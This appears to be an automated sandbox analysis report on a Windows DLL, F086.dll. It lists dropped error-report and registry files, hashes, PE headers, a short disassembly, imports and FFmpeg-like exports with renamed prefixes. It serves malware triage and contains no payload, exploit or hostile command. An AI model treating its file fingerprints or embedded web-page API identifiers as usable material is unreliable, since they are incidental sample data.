                                                                    SSDEEP:192:Rrl7r3GLNini6f6YOQb6dSgmfTOSfYCprz89baosf/a+m:RrlsNii6f6YDb6YgmfTOScabfS
                                                                    MD5:E60EEA97EE99D59780663EDEE0DE8460
                                                                    SHA1:143927A3FED2B5C78BE518CBA7823CC6938F5E51
                                                                    SHA-256:F813575214C37193722F72B315A6C9FC6AAB768CF766F8E43BAB4B7B7AC0391E
                                                                    SHA-512:DB79B0991C99438218737851A302255C256CAAF1317F77A99ABF2F25E5B62C21E83C80EFA1F1B71B3D3BF0704CF17E8F0E3DD037D669789F0F4F8C5E0E9F3284
                                                                    Malicious:false
                                                                     Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>17134</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString> <Revision>1</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>1033</LCID> </OSVersionInformation> <ProcessInformation> <Pid>6712</Pid>
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):8238
                                                                    Entropy (8bit):3.6920155677868385
                                                                    Encrypted:false
                                                                    SSDEEP:192:Rrl7r3GLNi6l67zV6YOQh6dSgmfTuSfYCprv89baTsfm+m:RrlsNio6d6YDh6YgmfTuSIa4fW
                                                                    MD5:DE4319E8C441245F384B05B6B5B5C653
                                                                    SHA1:6D0B3883B389339DC2E490D8B6BAC4344CFBEE85
                                                                    SHA-256:EDC27DAD3A574475430D7E5F56EC95A53F3AEC22D9ADBA23EF2C909877846F9A
                                                                    SHA-512:0FADEC2DAC2110B2EAC23F3AA982457E872E62CD64AA93F233259547A8B84BCC7B18CD8A73DEAF5217932F55924282F1777AF54CDDC70910F6B84E1C2D35AF97
                                                                    Malicious:false
                                                                     Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>17134</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString> <Revision>1</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>1033</LCID> </OSVersionInformation> <ProcessInformation> <Pid>7044</Pid>
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):4626
                                                                    Entropy (8bit):4.454121854302584
                                                                    Encrypted:false
                                                                    SSDEEP:48:cvIwSD8zs6KJgtWI9igmaWgc8sqYjX8fm8M4JCdsEZFm+q8/vKcfq+4SrSLd:uITf6YFgmbgrsqYoJiaUJfDWLd
                                                                    MD5:3745DA9156FE27B4ECAA551DA0ED5BF2
                                                                    SHA1:303B1E807AD1805551D5D206D2245EBD447A27B1
                                                                    SHA-256:F90210E2CBFF38CEDF01586F4DE9C26CDF046B63DF1CB296D1F0ECF6C8D98109
                                                                    SHA-512:D2D3F391783ACEAEC17DEDC9F41856CC4E333A1D47DBF3C14BC01706A6B482176C6EDD08118320B67E4ECDF5E3F6763F71510C9B2C869DFBEDF7AFB063924FCD
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="2064609" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):4626
                                                                    Entropy (8bit):4.455304131650404
                                                                    Encrypted:false
                                                                    SSDEEP:48:cvIwSD8zs6KJgtWI9igmaWgc8sqYj48fm8M4JCdsE9FLo+q8/v8/+4SrStd:uITf6YFgmbgrsqYhJizoUzDWtd
                                                                    MD5:CF06537C17E748E62E8A797BADA1E31B
                                                                    SHA1:C9645DDFE40BFBAEC7D2856F917AE4A1A762643B
                                                                    SHA-256:CD7CDEB64F4FFCD2FA5B2854C3AA610BF6FDACE8AB76F6FFE74504B74503494F
                                                                    SHA-512:AD4E9F901D295FC56E2E566EC28293752B902748B35DA02C21A69D70DE68FAD37928C4066F7A2250F4DDD557814BC804302820B5C4BD28AC6F1AA32226EFA9BE
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="2064609" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                    Process:C:\Windows\SysWOW64\wermgr.exe
                                                                    File Type:HTML document, ASCII text, with very long lines (65212)
                                                                    Category:dropped
                                                                    Size (bytes):149507
                                                                    Entropy (8bit):5.28662942755702
                                                                    Encrypted:false
                                                                    SSDEEP:3072:2DbDv9PpwZW+V6ssCcVwjhrTFJnZV12KfgxmyLjsfqW:EcgvW
                                                                    MD5:8AE3F8E84A72A4D14E4D04A25143D7F8
                                                                    SHA1:564305FB38FCDFB369082CDB94D568B6CDAA58F5
                                                                    SHA-256:C09BE827203DCD4DA4509396F5E38BBA16343CE9B2E3EF1770E8240F38ED0073
                                                                    SHA-512:27AECBF22B846427E74C00240DD0E140CCBF8FF67D5DB258327EBE3F469AE0F9190227BF924028F4F3E4F3A594644BA53ECCAB81FE6E62E32CB8852353A727E4
                                                                    Malicious:false
                                                                    Preview:<!doctype html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no"><meta name="theme-color" content="#000000"><script>if (typeof window !== "undefined" && typeof window.process === "undefined") {. window.process = window.process || { env: {} };. }</script><script type="env-config">{"clientId":"xfinity-learn-ui","sitecoreApiKey":"{1A57AE5E-AF7C-4A9E-803A-C756E3F23267}","sitecoreApiUrl":"https://jss.xfinity.com/","dictionaryKey":"{5FA0A82E-BBDB-4FBD-A3F4-9C5D07AA6E0E}","uniform":false,"oAuth":{"clientId":"shoplearn-web","endpoint":"https://oauth.xfinity.com"},"endpoints":{"ssmEnv":"https://api.sc.xfinity.com","aiQApiUrl":"https://aiq-prod.codebig2.net","errorRedirectUrl":"https://www.xfinity.com/learn/landing/sorry","cspApiUrl":"https://csp-prod.codebig2.net","dataLayerTimelineApiUrl":"https://bdl43tfhab.execute-api.us-east-1.amazonaws.com/prod/aiq-banner"},"environment":{"name":"PROD"},"appName":"xfinity-lea
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                    Category:dropped
                                                                    Size (bytes):1572864
                                                                    Entropy (8bit):4.294307157015669
                                                                    Encrypted:false
                                                                    SSDEEP:12288:mj6m1blaBcIee5TMcQ2oipXZxuB0+W7qPX12YvORAzxumEjIbkfv2deQ:u6m1blaBcIf5TML41Yv4
                                                                    MD5:9698CF482BE494ABB013D242D5215BE3
                                                                    SHA1:1054537E7556960B3A9A642E1471152C47C4B1ED
                                                                    SHA-256:2D56F2E09B52D20DC0FB075C446D877176E1A6AB246122123FBC329521BB2793
                                                                    SHA-512:5C1600FBF4B2C7A9BA9F2B7B83D84D371B068E652BF6B64041E67598CA6569EE936EB6B4D2F76BB953A534805A1D61FCCF4B96CC0CEF2BC278D8C7D7C46470E0
                                                                    Malicious:false
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                    Category:dropped
                                                                    Size (bytes):24576
                                                                    Entropy (8bit):2.6778791974928686
                                                                    Encrypted:false
                                                                    SSDEEP:192:X7v11vqByEtVYV5FSETqW/b3rINn8h8l1ZV6nGoV/UeU7GXZFW0/UeUS:rv526rINn88lTVgGe/Up7mZRUpS
                                                                    MD5:6A2E46503BFF1E6F68DF3446316AF1CC
                                                                    SHA1:1F76AD9948DE2F74008C1BC84174ABE0A37C7776
                                                                    SHA-256:FA381A033F6111B2FE05784E413AC34B35BE8105866AD7E60CCBD2BB4FC00186
                                                                    SHA-512:A47F35B2D5ADB967E33EFA8E0A6EA34AFE063E04D3600475389B3FB31C99DC0F9B352FF638D42D2FBEBD2DD4688F20D7375240DDDC234950A3076CC85D9B2C3A
                                                                    Malicious:false
                                                                    File type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                    Entropy (8bit):6.737928842435983
                                                                    TrID:
                                                                    • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                    • Generic Win/DOS Executable (2004/3) 0.20%
                                                                    • DOS Executable Generic (2002/1) 0.20%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:F086.dll
                                                                    File size:965185
                                                                    MD5:931f3d361902807103b23fa74beb16a2
                                                                    SHA1:9ec1f75beaf217246fd8d97fa3d1e591300babb3
                                                                    SHA256:5f1a29b7907453a8785d9e6087a85c7bfab6b7fe3955bd645cb37ffdb20409c5
                                                                    SHA512:4c8322f125e7b51e0c6375dd1ec14e2c71bbb1972f68afd038013ebba763ba0e41a960fd782b9eb3d8b739f4ab26b129cf9ba3dca9b1a21739a495abb25aaacc
                                                                    SSDEEP:24576:D7AkdHt+UnNtqbVotX4Dw/9JGCZdBK/+NYouXFPn/yd4X:DZ8RDwlJGoY7XX
                                                                    TLSH:B5258EC0FBD744FAE46718B1B09AB7AFAB3112050138CE76DFA58E09E976B401DDB245
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....0d...........#...'.....................................................0 .....{.....@... .........................hC.
                                                                    Icon Hash:7ae282899bbab082
                                                                    Entrypoint:0x10001390
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x10000000
                                                                    Subsystem:windows cui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DEBUG_STRIPPED, DLL
                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                    Time Stamp:0x6430AE80 [Sat Apr 8 00:00:00 2023 UTC]
                                                                    TLS Callbacks:0x10090cc0, 0x10090c70, 0x100a1c60
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:ac404a1028e7ce450416867d9b3974cc
                                                                    Instruction
                                                                    sub esp, 0Ch
                                                                    mov dword ptr [101D86FCh], 00000000h
                                                                    mov ecx, dword ptr [esp+18h]
                                                                    mov edx, dword ptr [esp+14h]
                                                                    mov eax, dword ptr [esp+10h]
                                                                    call 00007F6848D8C877h
                                                                    add esp, 0Ch
                                                                    retn 000Ch
                                                                    lea esi, dword ptr [esi+00000000h]
                                                                    lea esi, dword ptr [esi+00h]
                                                                    nop
                                                                    sub esp, 1Ch
                                                                    mov eax, dword ptr [esp+20h]
                                                                    mov dword ptr [esp], 100C9000h
                                                                    mov dword ptr [esp+04h], eax
                                                                    call 00007F6848E2B80Eh
                                                                    add esp, 1Ch
                                                                    ret
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    sub esp, 18h
                                                                    mov dword ptr [esp], 10001400h
                                                                    call 00007F6848D8C9F3h
                                                                    leave
                                                                    ret
                                                                    lea esi, dword ptr [esi+00000000h]
                                                                    lea esi, dword ptr [esi+00h]
                                                                    nop
                                                                    ret
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    push ebp
                                                                    push edi
                                                                    push esi
                                                                    push ebx
                                                                    mov edx, dword ptr [esp+14h]
                                                                    mov esi, dword ptr [esp+1Ch]
                                                                    mov edi, dword ptr [esp+18h]
                                                                    movzx ebx, dx
                                                                    shr edx, 10h
                                                                    test esi, esi
                                                                    je 00007F6848D8CAA8h
                                                                    nop
                                                                    cmp esi, 04h
                                                                    jbe 00007F6848D8CA62h
                                                                    lea esi, dword ptr [esi+00000000h]
                                                                    lea esi, dword ptr [esi+00h]
                                                                    movzx eax, byte ptr [edi]
                                                                    add edi, 04h
                                                                    sub esi, 04h
                                                                    movzx ebp, byte ptr [edi-03h]
                                                                    movzx ecx, byte ptr [edi-02h]
                                                                    add eax, ebx
                                                                    movzx ebx, byte ptr [edi-01h]

| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x1da000 | 0x4368 | .edata |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1df000 | 0x1388 | .idata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1e3000 | 0x378 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1e4000 | 0x4128 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0xc61e4 | 0x18 | .rdata |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x1df328 | 0x2c4 | .idata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0xab124 | 0xab200 | False | 0.4480831126734843 | data | 6.432110661692397 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .data | 0xad000 | 0x100 | 0x200 | False | 0.28125 | Matlab v4 mat-file (little endian) \377\377\377\377 , text, rows 4294967295, columns 4294967295, imaginary | 2.102897197014083 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rdata | 0xae000 | 0x1a624 | 0x1a800 | False | 0.3911224941037736 | data | 5.329684115990636 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .bss | 0xc9000 | 0x110264 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .edata | 0x1da000 | 0x4368 | 0x4400 | False | 0.4040670955882353 | data | 5.488698281853443 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .idata | 0x1df000 | 0x1388 | 0x1400 | False | 0.3810546875 | data | 5.386273709762828 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .CRT | 0x1e1000 | 0x30 | 0x200 | False | 0.060546875 | data | 0.25451054171027127 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .tls | 0x1e2000 | 0x8 | 0x200 | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x1e3000 | 0x1a64e | 0x1b000 | False | 0.9544722945601852 | data | 7.904997942181886 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .reloc | 0x1fe000 | 0x4128 | 0x4200 | False | 0.7178030303030303 | data | 6.590473987933104 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country |
|---|---|---|---|---|---|
| RT_VERSION | 0x1e3058 | 0x31c | data | English | United States |

| DLL | Import |
|---|---|
| bcrypt.dll | BCryptCloseAlgorithmProvider, BCryptGenRandom, BCryptOpenAlgorithmProvider |
| KERNEL32.dll | AcquireSRWLockExclusive, AddVectoredExceptionHandler, CloseHandle, CreateEventA, CreateFileMappingA, CreateMutexA, CreateSemaphoreA, DeleteCriticalSection, DuplicateHandle, EnterCriticalSection, FileTimeToSystemTime, FreeLibrary, GetConsoleMode, GetConsoleScreenBufferInfo, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetCurrentThreadId, GetFullPathNameW, GetHandleInformation, GetLastError, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleW, GetProcAddress, GetProcessAffinityMask, GetProcessTimes, GetStdHandle, GetSystemDirectoryW, GetSystemTimeAdjustment, GetSystemTimeAsFileTime, GetThreadContext, GetThreadPriority, GetThreadTimes, GetTickCount64, GetTimeZoneInformation, InitOnceBeginInitialize, InitOnceComplete, InitializeConditionVariable, InitializeCriticalSection, InitializeSRWLock, IsDBCSLeadByteEx, IsDebuggerPresent, LeaveCriticalSection, LoadLibraryA, LoadLibraryExA, LoadLibraryExW, MapViewOfFile, MultiByteToWideChar, OpenProcess, OutputDebugStringA, QueryPerformanceCounter, QueryPerformanceFrequency, RaiseException, ReleaseMutex, ReleaseSRWLockExclusive, ReleaseSemaphore, RemoveVectoredExceptionHandler, ResetEvent, ResumeThread, SetConsoleTextAttribute, SetEvent, SetLastError, SetProcessAffinityMask, SetSystemTime, SetThreadContext, SetThreadPriority, Sleep, SleepConditionVariableSRW, SuspendThread, TlsAlloc, TlsGetValue, TlsSetValue, TryEnterCriticalSection, UnmapViewOfFile, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WaitForSingleObjectEx, WakeAllConditionVariable, WakeConditionVariable, WideCharToMultiByte, WriteConsoleW |
| msvcrt.dll | __mb_cur_max, __setusermatherr, _aligned_free, _aligned_malloc, _aligned_realloc, _amsg_exit, _beginthreadex, _endthreadex, _errno, _fstat64, _get_osfhandle, _gmtime64, _hypot, _initterm, _iob, _localtime64, _lock, _mktime64, _setjmp3, _sopen, _ultoa, _unlock, _wsopen, abort, acos, asin, atan, atoi, bsearch, calloc, clock, cosh, exit, fprintf, fputc, fputs, free, fwrite, getc, getenv, islower, isspace, isupper, isxdigit, localeconv, log10, malloc, memchr, memcmp, memcpy, memmove, memset, printf, rand, realloc, setlocale, sinh, strchr, strcmp, strcpy, strcspn, strerror, strftime, strlen, strncmp, strrchr, strspn, strstr, strtol, strtoul, tan, tanh, tolower, ungetc, vfprintf, wcscat, wcscpy, wcslen, wcsrchr, longjmp, _strdup, _read, _isatty, _fdopen, _close |
| USER32.dll | GetDesktopWindow |

| Name | Ordinal | Address |
|---|---|---|
| mv_add_i | 1 | 0x10023c30 |
| mv_add_q | 2 | 0x10035990 |
| mv_add_stable | 3 | 0x10027e10 |
| mv_adler32_update | 4 | 0x10001410 |
| mv_aes_alloc | 5 | 0x10001bd0 |
| mv_aes_crypt | 6 | 0x10001bf0 |
| mv_aes_ctr_alloc | 7 | 0x100022f0 |
| mv_aes_ctr_crypt | 8 | 0x10002480 |
| mv_aes_ctr_free | 9 | 0x10002420 |
| mv_aes_ctr_get_iv | 10 | 0x10002370 |
| mv_aes_ctr_increment_iv | 11 | 0x10002430 |
| mv_aes_ctr_init | 12 | 0x100023c0 |
| mv_aes_ctr_set_full_iv | 13 | 0x10002340 |
| mv_aes_ctr_set_iv | 14 | 0x10002310 |
| mv_aes_ctr_set_random_iv | 15 | 0x10002380 |
| mv_aes_init | 16 | 0x10001c10 |
| mv_aes_size | 17 | 0x100ae00c |
| mv_append_path_component | 18 | 0x10006eb0 |
| mv_asprintf | 19 | 0x10006850 |
| mv_assert0_fpu | 20 | 0x1008cfa0 |
| mv_audio_fifo_alloc | 21 | 0x10002670 |
| mv_audio_fifo_drain | 22 | 0x10002af0 |
| mv_audio_fifo_free | 23 | 0x10002610 |
| mv_audio_fifo_peek | 24 | 0x10002900 |
| mv_audio_fifo_peek_at | 25 | 0x10002990 |
| mv_audio_fifo_read | 26 | 0x10002a40 |
| mv_audio_fifo_realloc | 27 | 0x100027b0 |
| mv_audio_fifo_reset | 28 | 0x10002b70 |
| mv_audio_fifo_size | 29 | 0x10002bb0 |
| mv_audio_fifo_space | 30 | 0x10002bc0 |
| mv_audio_fifo_write | 31 | 0x10002850 |
| mv_base64_decode | 32 | 0x100076c0 |
| mv_base64_encode | 33 | 0x100078d0 |
| mv_basename | 34 | 0x10006d70 |
| mv_blowfish_alloc | 35 | 0x10007da0 |
| mv_blowfish_crypt | 36 | 0x100084b0 |
| mv_blowfish_crypt_ecb | 37 | 0x10007dc0 |
| mv_blowfish_init | 38 | 0x100a6ac0 |
| mv_bmg_get | 39 | 0x10024fe0 |
| mv_bprint_append_data | 40 | 0x10008f30 |
| mv_bprint_channel_layout | 41 | 0x1000c9f0 |
| mv_bprint_chars | 42 | 0x10008d20 |
| mv_bprint_clear | 43 | 0x10009670 |
| mv_bprint_escape | 44 | 0x10009730 |
| mv_bprint_finalize | 45 | 0x10009690 |
| mv_bprint_get_buffer | 46 | 0x10009500 |
| mv_bprint_init | 47 | 0x10008880 |
| mv_bprint_init_for_buffer | 48 | 0x100089a0 |
| mv_bprint_strftime | 49 | 0x10009130 |
| mv_bprintf | 50 | 0x100089c0 |
| mv_buffer_alloc | 51 | 0x10009dc0 |
| mv_buffer_allocz | 52 | 0x10009ef0 |
| mv_buffer_create | 53 | 0x10009e60 |
| mv_buffer_default_free | 54 | 0x10009d10 |
| mv_buffer_get_opaque | 55 | 0x1000a090 |
| mv_buffer_get_ref_count | 56 | 0x1000a0a0 |
| mv_buffer_is_writable | 57 | 0x1000a070 |
| mv_buffer_make_writable | 58 | 0x1000a0b0 |
| mv_buffer_pool_buffer_get_opaque | 59 | 0x1000a9b0 |
| mv_buffer_pool_get | 60 | 0x1000a720 |
| mv_buffer_pool_init | 61 | 0x1000a5f0 |
| mv_buffer_pool_init2 | 62 | 0x1000a590 |
| mv_buffer_pool_uninit | 63 | 0x1000a650 |
| mv_buffer_realloc | 64 | 0x1000a1d0 |
| mv_buffer_ref | 65 | 0x10009fc0 |
| mv_buffer_replace | 66 | 0x1000a480 |
| mv_buffer_unref | 67 | 0x1000a000 |
| mv_calloc | 68 | 0x100291f0 |
| mv_camellia_alloc | 69 | 0x1000b0b0 |
| mv_camellia_crypt | 70 | 0x1000b0d0 |
| mv_camellia_init | 71 | 0x100a6c8e |
| mv_camellia_size | 72 | 0x100af650 |
| mv_cast5_alloc | 73 | 0x1000c090 |
| mv_cast5_crypt | 74 | 0x1000c1b0 |
| mv_cast5_crypt2 | 75 | 0x1000c0b0 |
| mv_cast5_init | 76 | 0x100a7a6e |
| mv_cast5_size | 77 | 0x100b1a60 |
| mv_channel_description | 78 | 0x1000c470 |
| mv_channel_description_bprint | 79 | 0x1000c3c0 |
| mv_channel_from_string | 80 | 0x1000c560 |
| mv_channel_layout_channel_from_index | 81 | 0x1000dc10 |
| mv_channel_layout_channel_from_string | 82 | 0x1000eac0 |
| mv_channel_layout_check | 83 | 0x1000ec10 |
| mv_channel_layout_compare | 84 | 0x1000edb0 |
| mv_channel_layout_copy | 85 | 0x1000d340 |
| mv_channel_layout_default | 86 | 0x1000eff0 |
| mv_channel_layout_describe | 87 | 0x1000dba0 |
| mv_channel_layout_describe_bprint | 88 | 0x1000d4d0 |
| mv_channel_layout_extract_channel | 89 | 0x1000d060 |
| mv_channel_layout_from_mask | 90 | 0x1000d1b0 |
| mv_channel_layout_from_string | 91 | 0x1000dd40 |
| mv_channel_layout_index_from_channel | 92 | 0x1000e760 |
| mv_channel_layout_index_from_string | 93 | 0x1000e950 |
| mv_channel_layout_standard | 94 | 0x1000f050 |
| mv_channel_layout_subset | 95 | 0x1000f080 |
| mv_channel_layout_uninit | 96 | 0x1000d270 |
| mv_channel_name | 97 | 0x1000c2d0 |
| mv_channel_name_bprint | 98 | 0x1000c220 |
| mv_chroma_location_enum_to_pos | 99 | 0x10034f30 |
| mv_chroma_location_from_name | 100 | 0x10034ee0 |
| mv_chroma_location_name | 101 | 0x10034ec0 |
| mv_chroma_location_pos_to_enum | 102 | 0x10034f70 |
| mv_cmp_i | 103 | 0x10024200 |
| mv_color_primaries_from_name | 104 | 0x10034d90 |
| mv_color_primaries_name | 105 | 0x10034d70 |
| mv_color_range_from_name | 106 | 0x10034d20 |
| mv_color_range_name | 107 | 0x10034d00 |
| mv_color_space_from_name | 108 | 0x10034e70 |
| mv_color_space_name | 109 | 0x10034e50 |
| mv_color_transfer_from_name | 110 | 0x10034e00 |
| mv_color_transfer_name | 111 | 0x10034de0 |
| mv_compare_mod | 112 | 0x100279f0 |
| mv_compare_ts | 113 | 0x10027830 |
| mv_content_light_metadata_alloc | 114 | 0x10027020 |
| mv_content_light_metadata_create_side_data | 115 | 0x10027050 |
| mv_cpu_count | 116 | 0x1000f8f0 |
| mv_cpu_force_count | 117 | 0x1000f9e0 |
| mv_cpu_max_align | 118 | 0x1000f9f0 |
| mv_crc | 119 | 0x100101d0 |
| mv_crc_get_table | 120 | 0x1000fdb0 |
| mv_crc_init | 121 | 0x1000fbc0 |
| mv_csp_luma_coeffs_from_avcsp | 122 | 0x100102b0 |
| mv_csp_primaries_desc_from_id | 123 | 0x100102f0 |
| mv_csp_primaries_id_from_desc | 124 | 0x10010320 |
| mv_d2q | 125 | 0x10035aa0 |
| mv_d2str | 126 | 0x100068e0 |
| mv_default_get_category | 127 | 0x10026240 |
| mv_default_item_name | 128 | 0x10026230 |
| mv_des_alloc | 129 | 0x10010d80 |
| mv_des_crypt | 130 | 0x10010e40 |
| mv_des_init | 131 | 0x10010da0 |
| mv_des_mac | 132 | 0x10010e90 |
| mv_detection_bbox_alloc | 133 | 0x10010ee0 |
| mv_detection_bbox_create_side_data | 134 | 0x10010f70 |
| mv_dict_copy | 135 | 0x10011d20 |
| mv_dict_count | 136 | 0x10011070 |
| mv_dict_free | 137 | 0x10011cc0 |
| mv_dict_get | 138 | 0x100110d0 |
| mv_dict_get_string | 139 | 0x100121a0 |
| mv_dict_iterate | 140 | 0x10011090 |
| mv_dict_parse_string | 141 | 0x100118c0 |
| mv_dict_set | 142 | 0x10011210 |
| mv_dict_set_int | 143 | 0x10011560 |
| mv_dirname | 144 | 0x10006e10 |
| mv_display_matrix_flip | 145 | 0x100126f0 |
| mv_display_rotation_get | 146 | 0x10012470 |
| mv_display_rotation_set | 147 | 0x100125c0 |
| mv_div_i | 148 | 0x10024ef0 |
| mv_div_q | 149 | 0x10035920 |
| mv_dovi_alloc | 150 | 0x10012780 |
| mv_dovi_metadata_alloc | 151 | 0x100127b0 |
| mv_downmix_info_update_side_data | 152 | 0x10012800 |
| mv_dynamic_hdr_plus_alloc | 153 | 0x1001d0a0 |
| mv_dynamic_hdr_plus_create_side_data | 154 | 0x1001d0d0 |
| mv_dynamic_hdr_vivid_alloc | 155 | 0x1001d130 |
| mv_dynamic_hdr_vivid_create_side_data | 156 | 0x1001d160 |
| mv_dynarray2_add | 157 | 0x100296f0 |
| mv_dynarray_add | 158 | 0x10029620 |
| mv_dynarray_add_nofree | 159 | 0x10029560 |
| mv_encryption_info_add_side_data | 160 | 0x10012f30 |
| mv_encryption_info_alloc | 161 | 0x10012a70 |
| mv_encryption_info_clone | 162 | 0x10012b40 |
| mv_encryption_info_free | 163 | 0x10012cf0 |
